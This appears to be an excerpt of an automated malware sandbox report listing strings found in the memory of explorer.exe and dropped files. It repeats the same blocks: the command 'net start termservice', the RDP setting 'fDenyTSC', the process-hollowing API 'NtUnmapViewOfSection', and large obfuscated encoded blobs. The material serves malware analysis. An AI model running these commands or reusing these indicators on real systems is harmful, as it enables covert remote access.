          Source: comp.exe, 0000000A.00000002.1787365000.0000000004EC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setfae622981b45c94a11d1e551bdee1214f5a43204a66445ad0e09c0db80eb910b153632004d7d6de3766cb72a9a1dc6402e31acgWcX2NTgPXYUekysBNEbhBv8dpJoPJVcg24=Q2g02eXnPnJXOw2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKyn32coQ2g02eXnPnJXPA2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKCn32coQzld2TnhK3KgciGlBSok3APUMqFs3r==SS8rDn==Zy4g3ySqOS5n5H==QSZn5H==3T3eEaK2DUxrPO==W3lV5OTqBnOY1O==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyJTVc4Q==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8MOLi3juNcEOs2sEwfWra00NDZ3Vc4ePY3B==ZmZo325fzt7AyGCHTCeSysbpPXy7Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyhnZpQxvpCABaZHNqQUHe2YF=Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8LTfi2HpaTk2sPwYogq==OVZOIMHNKl2AUSqFzG==2EJr4r==ZEcOMr==W0ZPfWU1inQ1h2U1g3Q13mo13XM1hGQ1iW814G413X21gH21g2g1hj4=33NgQt3h2Hq200qp3s8afArY33NgQt3h2Hp=32Bk4t3h2Hp=4DI=4TI=4TM=4TQ=YWJk38==fHVV4umsBx==fHVV4yK3Bz1=4Xlg4GBn325fhHQsgXRkjmprQ3JW2NTXUGQ+UGU+Q1Fn5Nbm2oFpPywmNw==kA==OnZp2OO6UQ==h2lg3xuwCjYedEp=f2Zt3dTpCABo1EqsW2ZVKdDX1YSfW1ez4wYjWQZccz==ZHNqQUHe2VKbfEycVV3wLSOdK32gfF7h3cX=VX3k4dC=X2Ju4xTv33mZKCqhO7==WVRAMr==ZGJpQxCdK3OdfVCp4xn=WGce5x7vyG7f0e==VV3CRz2rMx7XOXqN1UG13coQiK==VmpVQxTjPXYe1VB=Ymct5x7rZ2cr2x7wV2co3TPs02ppIxTjPXYe1VB=RDItDqOYDk6YQO==hmM=i2M=V2cp5xTr4DUOgVulE9EjhQrQb0Fl3eGo4mct3JZhOYKbQwui2TYk3AzofW4xBJQmQS4oCJYqIQty3T3XPXYUNSKp3TElgWfQbZcyE rfg3NoCNPe4Hx1KEYh2MXZMgL8eJImEprffWBg3dDqPUTcNg4FHT7r4HOofAUU5NEbScv8dKFw1NDaiGpq3 7sO4KffAUz4xMb2QUDDj4OIQsoCJYqBTT=QS4It8==U3Re4aYuQmtrQn==V2cp5xTr4DUOgVulE9E8gBvibZRl4xbogicZCOb04zUgd1CtBNYofAPkZ5coPNG=Z1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7S02t3xYQ3RDEZZ5pNvDogXFW5xTvJnyn1O==V2co4yTXPYCI0UUl3WNeQxTjP3ajckms2M8lgBzod6V54e4XjXsrDKGwDENWPx 5BLa=QXZp2NLsPHNnZ1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7XUYp4wYaZgfa0ZcgGRZH0FNKKwvTIVKzVZp=Z1pOMvTKNFGpdlKy2SAJ3RKmNGJgKTLrimpeQOL GnytcUGE1NQmfAzVYI3tPxLo0mpfQN7GHB==2DErDuy=WGZhPOTp4GGffFKp2cgpPfbI00Rz2yLTfWcpWGZhPOTp4GGffFKp2cgpPffI00Rz2yLTfWcpZ0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3QbKcP G4OsekOu4v2bghHfc58=ZHNqQyTg4FYbdUN=RjEsFH==RjEtD8==RjEsE8==RjEtEH==V3Zt4dTr4FCVcUqk2A==Tjs1hnZpQxvpCABo1ValQ2wbNnVc4Tro1XqmKA2mysbffMu9NiEhA zX1XUfd1O0ytH7NcS70JZwyr==Oi2bIOfm4DB=NiEhA zvPXXaNC2hzr==ZGcYQOHw1HOmdAYl5wX=QWZZQNLY4Hepdluv2wo iMvo0Z5z4xLsfWhpQNOdBVSjdENgy7==Ng==h2lW5xPs43XaNVFgBNT7Qu==h3U44n==hmJpQx7qX2Z0Pd7e3nJaVEy52TYQ1zvo0ZBzONG=RDErDuyXCUd=RDErDuyXCkB=RDErDuyXCkF=RDErDuyXC3R=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSC
          Source: explorer.exeString found in binary or memory: net start termservice
          Source: explorer.exe, 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpString found in binary or memory: net start termservice
          Source: explorer.exe, 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setfae622981b45c94a11d1e551bdee1214f5a43204a66445ad0e09c0db80eb910b153632004d7d6de3766cb72a9a1dc6402e31acgWcX2NTgPXYUekysBNEbhBv8dpJoPJVcg24=Q2g02eXnPnJXOw2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKyn32coQ2g02eXnPnJXPA2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKCn32coQzld2TnhK3KgciGlBSok3APUMqFs3r==SS8rDn==Zy4g3ySqOS5n5H==QSZn5H==3T3eEaK2DUxrPO==W3lV5OTqBnOY1O==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyJTVc4Q==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8MOLi3juNcEOs2sEwfWra00NDZ3Vc4ePY3B==ZmZo325fzt7AyGCHTCeSysbpPXy7Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyhnZpQxvpCABaZHNqQUHe2YF=Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8LTfi2HpaTk2sPwYogq==OVZOIMHNKl2AUSqFzG==2EJr4r==ZEcOMr==W0ZPfWU1inQ1h2U1g3Q13mo13XM1hGQ1iW814G413X21gH21g2g1hj4=33NgQt3h2Hq200qp3s8afArY33NgQt3h2Hp=32Bk4t3h2Hp=4DI=4TI=4TM=4TQ=YWJk38==fHVV4umsBx==fHVV4yK3Bz1=4Xlg4GBn325fhHQsgXRkjmprQ3JW2NTXUGQ+UGU+Q1Fn5Nbm2oFpPywmNw==kA==OnZp2OO6UQ==h2lg3xuwCjYedEp=f2Zt3dTpCABo1EqsW2ZVKdDX1YSfW1ez4wYjWQZccz==ZHNqQUHe2VKbfEycVV3wLSOdK32gfF7h3cX=VX3k4dC=X2Ju4xTv33mZKCqhO7==WVRAMr==ZGJpQxCdK3OdfVCp4xn=WGce5x7vyG7f0e==VV3CRz2rMx7XOXqN1UG13coQiK==VmpVQxTjPXYe1VB=Ymct5x7rZ2cr2x7wV2co3TPs02ppIxTjPXYe1VB=RDItDqOYDk6YQO==hmM=i2M=V2cp5xTr4DUOgVulE9EjhQrQb0Fl3eGo4mct3JZhOYKbQwui2TYk3AzofW4xBJQmQS4oCJYqIQty3T3XPXYUNSKp3TElgWfQbZcyE rfg3NoCNPe4Hx1KEYh2MXZMgL8eJImEprffWBg3dDqPUTcNg4FHT7r4HOofAUU5NEbScv8dKFw1NDaiGpq3 7sO4KffAUz4xMb2QUDDj4OIQsoCJYqBTT=QS4It8==U3Re4aYuQmtrQn==V2cp5xTr4DUOgVulE9E8gBvibZRl4xbogicZCOb04zUgd1CtBNYofAPkZ5coPNG=Z1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7S02t3xYQ3RDEZZ5pNvDogXFW5xTvJnyn1O==V2co4yTXPYCI0UUl3WNeQxTjP3ajckms2M8lgBzod6V54e4XjXsrDKGwDENWPx 5BLa=QXZp2NLsPHNnZ1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7XUYp4wYaZgfa0ZcgGRZH0FNKKwvTIVKzVZp=Z1pOMvTKNFGpdlKy2SAJ3RKmNGJgKTLrimpeQOL GnytcUGE1NQmfAzVYI3tPxLo0mpfQN7GHB==2DErDuy=WGZhPOTp4GGffFKp2cgpPfbI00Rz2yLTfWcpWGZhPOTp4GGffFKp2cgpPffI00Rz2yLTfWcpZ0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3QbKcP G4OsekOu4v2bghHfc58=ZHNqQyTg4FYbdUN=RjEsFH==RjEtD8==RjEsE8==RjEtEH==V3Zt4dTr4FCVcUqk2A==Tjs1hnZpQxvpCABo1ValQ2wbNnVc4Tro1XqmKA2mysbffMu9NiEhA zX1XUfd1O0ytH7NcS70JZwyr==Oi2bIOfm4DB=NiEhA zvPXXaNC2hzr==ZGcYQOHw1HOmdAYl5wX=QWZZQNLY4Hepdluv2wo iMvo0Z5z4xLsfWhpQNOdBVSjdENgy7==Ng==h2lW5xPs43XaNVFgBNT7Qu==h3U44n==hmJpQx7qX2Z0Pd7e3nJaVEy52TYQ1zvo0ZBzONG=RDErDuyXCUd=RDErDuyXCkB=RDErDuyXCkF=RDErDuyXC3R=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSC
          Source: explorer.exe, 0000000D.00000002.1719815362.0000000000960000.00000002.00000001.01000000.00000000.sdmpString found in binary or memory: net start termservice
          Source: explorer.exe, 0000000D.00000002.1719815362.0000000000960000.00000002.00000001.01000000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setfae622981b45c94a11d1e551bdee1214f5a43204a66445ad0e09c0db80eb910b153632004d7d6de3766cb72a9a1dc6402e31acgWcX2NTgPXYUekysBNEbhBv8dpJoPJVcg24=Q2g02eXnPnJXOw2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKyn32coQ2g02eXnPnJXPA2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKCn32coQzld2TnhK3KgciGlBSok3APUMqFs3r==SS8rDn==Zy4g3ySqOS5n5H==QSZn5H==3T3eEaK2DUxrPO==W3lV5OTqBnOY1O==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyJTVc4Q==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8MOLi3juNcEOs2sEwfWra00NDZ3Vc4ePY3B==ZmZo325fzt7AyGCHTCeSysbpPXy7Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyhnZpQxvpCABaZHNqQUHe2YF=Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8LTfi2HpaTk2sPwYogq==OVZOIMHNKl2AUSqFzG==2EJr4r==ZEcOMr==W0ZPfWU1inQ1h2U1g3Q13mo13XM1hGQ1iW814G413X21gH21g2g1hj4=33NgQt3h2Hq200qp3s8afArY33NgQt3h2Hp=32Bk4t3h2Hp=4DI=4TI=4TM=4TQ=YWJk38==fHVV4umsBx==fHVV4yK3Bz1=4Xlg4GBn325fhHQsgXRkjmprQ3JW2NTXUGQ+UGU+Q1Fn5Nbm2oFpPywmNw==kA==OnZp2OO6UQ==h2lg3xuwCjYedEp=f2Zt3dTpCABo1EqsW2ZVKdDX1YSfW1ez4wYjWQZccz==ZHNqQUHe2VKbfEycVV3wLSOdK32gfF7h3cX=VX3k4dC=X2Ju4xTv33mZKCqhO7==WVRAMr==ZGJpQxCdK3OdfVCp4xn=WGce5x7vyG7f0e==VV3CRz2rMx7XOXqN1UG13coQiK==VmpVQxTjPXYe1VB=Ymct5x7rZ2cr2x7wV2co3TPs02ppIxTjPXYe1VB=RDItDqOYDk6YQO==hmM=i2M=V2cp5xTr4DUOgVulE9EjhQrQb0Fl3eGo4mct3JZhOYKbQwui2TYk3AzofW4xBJQmQS4oCJYqIQty3T3XPXYUNSKp3TElgWfQbZcyE rfg3NoCNPe4Hx1KEYh2MXZMgL8eJImEprffWBg3dDqPUTcNg4FHT7r4HOofAUU5NEbScv8dKFw1NDaiGpq3 7sO4KffAUz4xMb2QUDDj4OIQsoCJYqBTT=QS4It8==U3Re4aYuQmtrQn==V2cp5xTr4DUOgVulE9E8gBvibZRl4xbogicZCOb04zUgd1CtBNYofAPkZ5coPNG=Z1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7S02t3xYQ3RDEZZ5pNvDogXFW5xTvJnyn1O==V2co4yTXPYCI0UUl3WNeQxTjP3ajckms2M8lgBzod6V54e4XjXsrDKGwDENWPx 5BLa=QXZp2NLsPHNnZ1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7XUYp4wYaZgfa0ZcgGRZH0FNKKwvTIVKzVZp=Z1pOMvTKNFGpdlKy2SAJ3RKmNGJgKTLrimpeQOL GnytcUGE1NQmfAzVYI3tPxLo0mpfQN7GHB==2DErDuy=WGZhPOTp4GGffFKp2cgpPfbI00Rz2yLTfWcpWGZhPOTp4GGffFKp2cgpPffI00Rz2yLTfWcpZ0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3QbKcP G4OsekOu4v2bghHfc58=ZHNqQyTg4FYbdUN=RjEsFH==RjEtD8==RjEsE8==RjEtEH==V3Zt4dTr4FCVcUqk2A==Tjs1hnZpQxvpCABo1ValQ2wbNnVc4Tro1XqmKA2mysbffMu9NiEhA zX1XUfd1O0ytH7NcS70JZwyr==Oi2bIOfm4DB=NiEhA zvPXXaNC2hzr==ZGcYQOHw1HOmdAYl5wX=QWZZQNLY4Hepdluv2wo iMvo0Z5z4xLsfWhpQNOdBVSjdENgy7==Ng==h2lW5xPs43XaNVFgBNT7Qu==h3U44n==hmJpQx7qX2Z0Pd7e3nJaVEy52TYQ1zvo0ZBzONG=RDErDuyXCUd=RDErDuyXCkB=RDErDuyXCkF=RDErDuyXC3R=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSC
          Source: explorer.exe, 0000000F.00000002.1787969074.0000000000220000.00000002.00000001.01000000.00000000.sdmpString found in binary or memory: net start termservice
          Source: explorer.exe, 0000000F.00000002.1787969074.0000000000220000.00000002.00000001.01000000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setfae622981b45c94a11d1e551bdee1214f5a43204a66445ad0e09c0db80eb910b153632004d7d6de3766cb72a9a1dc6402e31acgWcX2NTgPXYUekysBNEbhBv8dpJoPJVcg24=Q2g02eXnPnJXOw2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKyn32coQ2g02eXnPnJXPA2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKCn32coQzld2TnhK3KgciGlBSok3APUMqFs3r==SS8rDn==Zy4g3ySqOS5n5H==QSZn5H==3T3eEaK2DUxrPO==W3lV5OTqBnOY1O==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyJTVc4Q==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8MOLi3juNcEOs2sEwfWra00NDZ3Vc4ePY3B==ZmZo325fzt7AyGCHTCeSysbpPXy7Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyhnZpQxvpCABaZHNqQUHe2YF=Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8LTfi2HpaTk2sPwYogq==OVZOIMHNKl2AUSqFzG==2EJr4r==ZEcOMr==W0ZPfWU1inQ1h2U1g3Q13mo13XM1hGQ1iW814G413X21gH21g2g1hj4=33NgQt3h2Hq200qp3s8afArY33NgQt3h2Hp=32Bk4t3h2Hp=4DI=4TI=4TM=4TQ=YWJk38==fHVV4umsBx==fHVV4yK3Bz1=4Xlg4GBn325fhHQsgXRkjmprQ3JW2NTXUGQ+UGU+Q1Fn5Nbm2oFpPywmNw==kA==OnZp2OO6UQ==h2lg3xuwCjYedEp=f2Zt3dTpCABo1EqsW2ZVKdDX1YSfW1ez4wYjWQZccz==ZHNqQUHe2VKbfEycVV3wLSOdK32gfF7h3cX=VX3k4dC=X2Ju4xTv33mZKCqhO7==WVRAMr==ZGJpQxCdK3OdfVCp4xn=WGce5x7vyG7f0e==VV3CRz2rMx7XOXqN1UG13coQiK==VmpVQxTjPXYe1VB=Ymct5x7rZ2cr2x7wV2co3TPs02ppIxTjPXYe1VB=RDItDqOYDk6YQO==hmM=i2M=V2cp5xTr4DUOgVulE9EjhQrQb0Fl3eGo4mct3JZhOYKbQwui2TYk3AzofW4xBJQmQS4oCJYqIQty3T3XPXYUNSKp3TElgWfQbZcyE rfg3NoCNPe4Hx1KEYh2MXZMgL8eJImEprffWBg3dDqPUTcNg4FHT7r4HOofAUU5NEbScv8dKFw1NDaiGpq3 7sO4KffAUz4xMb2QUDDj4OIQsoCJYqBTT=QS4It8==U3Re4aYuQmtrQn==V2cp5xTr4DUOgVulE9E8gBvibZRl4xbogicZCOb04zUgd1CtBNYofAPkZ5coPNG=Z1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7S02t3xYQ3RDEZZ5pNvDogXFW5xTvJnyn1O==V2co4yTXPYCI0UUl3WNeQxTjP3ajckms2M8lgBzod6V54e4XjXsrDKGwDENWPx 5BLa=QXZp2NLsPHNnZ1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7XUYp4wYaZgfa0ZcgGRZH0FNKKwvTIVKzVZp=Z1pOMvTKNFGpdlKy2SAJ3RKmNGJgKTLrimpeQOL GnytcUGE1NQmfAzVYI3tPxLo0mpfQN7GHB==2DErDuy=WGZhPOTp4GGffFKp2cgpPfbI00Rz2yLTfWcpWGZhPOTp4GGffFKp2cgpPffI00Rz2yLTfWcpZ0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3QbKcP G4OsekOu4v2bghHfc58=ZHNqQyTg4FYbdUN=RjEsFH==RjEtD8==RjEsE8==RjEtEH==V3Zt4dTr4FCVcUqk2A==Tjs1hnZpQxvpCABo1ValQ2wbNnVc4Tro1XqmKA2mysbffMu9NiEhA zX1XUfd1O0ytH7NcS70JZwyr==Oi2bIOfm4DB=NiEhA zvPXXaNC2hzr==ZGcYQOHw1HOmdAYl5wX=QWZZQNLY4Hepdluv2wo iMvo0Z5z4xLsfWhpQNOdBVSjdENgy7==Ng==h2lW5xPs43XaNVFgBNT7Qu==h3U44n==hmJpQx7qX2Z0Pd7e3nJaVEy52TYQ1zvo0ZBzONG=RDErDuyXCUd=RDErDuyXCkB=RDErDuyXCkF=RDErDuyXC3R=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSC
          Source: cckrnaa.10.drString found in binary or memory: net start termservice
          Source: cckrnaa.10.drString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setfae622981b45c94a11d1e551bdee1214f5a43204a66445ad0e09c0db80eb910b153632004d7d6de3766cb72a9a1dc6402e31acgWcX2NTgPXYUekysBNEbhBv8dpJoPJVcg24=Q2g02eXnPnJXOw2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKyn32coQ2g02eXnPnJXPA2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKCn32coQzld2TnhK3KgciGlBSok3APUMqFs3r==SS8rDn==Zy4g3ySqOS5n5H==QSZn5H==3T3eEaK2DUxrPO==W3lV5OTqBnOY1O==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyJTVc4Q==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8MOLi3juNcEOs2sEwfWra00NDZ3Vc4ePY3B==ZmZo325fzt7AyGCHTCeSysbpPXy7Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyhnZpQxvpCABaZHNqQUHe2YF=Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8LTfi2HpaTk2sPwYogq==OVZOIMHNKl2AUSqFzG==2EJr4r==ZEcOMr==W0ZPfWU1inQ1h2U1g3Q13mo13XM1hGQ1iW814G413X21gH21g2g1hj4=33NgQt3h2Hq200qp3s8afArY33NgQt3h2Hp=32Bk4t3h2Hp=4DI=4TI=4TM=4TQ=YWJk38==fHVV4umsBx==fHVV4yK3Bz1=4Xlg4GBn325fhHQsgXRkjmprQ3JW2NTXUGQ+UGU+Q1Fn5Nbm2oFpPywmNw==kA==OnZp2OO6UQ==h2lg3xuwCjYedEp=f2Zt3dTpCABo1EqsW2ZVKdDX1YSfW1ez4wYjWQZccz==ZHNqQUHe2VKbfEycVV3wLSOdK32gfF7h3cX=VX3k4dC=X2Ju4xTv33mZKCqhO7==WVRAMr==ZGJpQxCdK3OdfVCp4xn=WGce5x7vyG7f0e==VV3CRz2rMx7XOXqN1UG13coQiK==VmpVQxTjPXYe1VB=Ymct5x7rZ2cr2x7wV2co3TPs02ppIxTjPXYe1VB=RDItDqOYDk6YQO==hmM=i2M=V2cp5xTr4DUOgVulE9EjhQrQb0Fl3eGo4mct3JZhOYKbQwui2TYk3AzofW4xBJQmQS4oCJYqIQty3T3XPXYUNSKp3TElgWfQbZcyE rfg3NoCNPe4Hx1KEYh2MXZMgL8eJImEprffWBg3dDqPUTcNg4FHT7r4HOofAUU5NEbScv8dKFw1NDaiGpq3 7sO4KffAUz4xMb2QUDDj4OIQsoCJYqBTT=QS4It8==U3Re4aYuQmtrQn==V2cp5xTr4DUOgVulE9E8gBvibZRl4xbogicZCOb04zUgd1CtBNYofAPkZ5coPNG=Z1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7S02t3xYQ3RDEZZ5pNvDogXFW5xTvJnyn1O==V2co4yTXPYCI0UUl3WNeQxTjP3ajckms2M8lgBzod6V54e4XjXsrDKGwDENWPx 5BLa=QXZp2NLsPHNnZ1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7XUYp4wYaZgfa0ZcgGRZH0FNKKwvTIVKzVZp=Z1pOMvTKNFGpdlKy2SAJ3RKmNGJgKTLrimpeQOL GnytcUGE1NQmfAzVYI3tPxLo0mpfQN7GHB==2DErDuy=WGZhPOTp4GGffFKp2cgpPfbI00Rz2yLTfWcpWGZhPOTp4GGffFKp2cgpPffI00Rz2yLTfWcpZ0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3QbKcP G4OsekOu4v2bghHfc58=ZHNqQyTg4FYbdUN=RjEsFH==RjEtD8==RjEsE8==RjEtEH==V3Zt4dTr4FCVcUqk2A==Tjs1hnZpQxvpCABo1ValQ2wbNnVc4Tro1XqmKA2mysbffMu9NiEhA zX1XUfd1O0ytH7NcS70JZwyr==Oi2bIOfm4DB=NiEhA zvPXXaNC2hzr==ZGcYQOHw1HOmdAYl5wX=QWZZQNLY4Hepdluv2wo iMvo0Z5z4xLsfWhpQNOdBVSjdENgy7==Ng==h2lW5xPs43XaNVFgBNT7Qu==h3U44n==hmJpQx7qX2Z0Pd7e3nJaVEy52TYQ1zvo0ZBzONG=RDErDuyXCUd=RDErDuyXCkB=RDErDuyXCkF=RDErDuyXC3R=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSC
          Source: pbxllkvlhugf.8.drString found in binary or memory: net start termservice
          Source: pbxllkvlhugf.8.drString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setfae622981b45c94a11d1e551bdee1214f5a43204a66445ad0e09c0db80eb910b153632004d7d6de3766cb72a9a1dc6402e31acgWcX2NTgPXYUekysBNEbhBv8dpJoPJVcg24=Q2g02eXnPnJXOw2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKyn32coQ2g02eXnPnJXPA2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKCn32coQzld2TnhK3KgciGlBSok3APUMqFs3r==SS8rDn==Zy4g3ySqOS5n5H==QSZn5H==3T3eEaK2DUxrPO==W3lV5OTqBnOY1O==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyJTVc4Q==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8MOLi3juNcEOs2sEwfWra00NDZ3Vc4ePY3B==ZmZo325fzt7AyGCHTCeSysbpPXy7Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyhnZpQxvpCABaZHNqQUHe2YF=Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8LTfi2HpaTk2sPwYogq==OVZOIMHNKl2AUSqFzG==2EJr4r==ZEcOMr==W0ZPfWU1inQ1h2U1g3Q13mo13XM1hGQ1iW814G413X21gH21g2g1hj4=33NgQt3h2Hq200qp3s8afArY33NgQt3h2Hp=32Bk4t3h2Hp=4DI=4TI=4TM=4TQ=YWJk38==fHVV4umsBx==fHVV4yK3Bz1=4Xlg4GBn325fhHQsgXRkjmprQ3JW2NTXUGQ+UGU+Q1Fn5Nbm2oFpPywmNw==kA==OnZp2OO6UQ==h2lg3xuwCjYedEp=f2Zt3dTpCABo1EqsW2ZVKdDX1YSfW1ez4wYjWQZccz==ZHNqQUHe2VKbfEycVV3wLSOdK32gfF7h3cX=VX3k4dC=X2Ju4xTv33mZKCqhO7==WVRAMr==ZGJpQxCdK3OdfVCp4xn=WGce5x7vyG7f0e==VV3CRz2rMx7XOXqN1UG13coQiK==VmpVQxTjPXYe1VB=Ymct5x7rZ2cr2x7wV2co3TPs02ppIxTjPXYe1VB=RDItDqOYDk6YQO==hmM=i2M=V2cp5xTr4DUOgVulE9EjhQrQb0Fl3eGo4mct3JZhOYKbQwui2TYk3AzofW4xBJQmQS4oCJYqIQty3T3XPXYUNSKp3TElgWfQbZcyE rfg3NoCNPe4Hx1KEYh2MXZMgL8eJImEprffWBg3dDqPUTcNg4FHT7r4HOofAUU5NEbScv8dKFw1NDaiGpq3 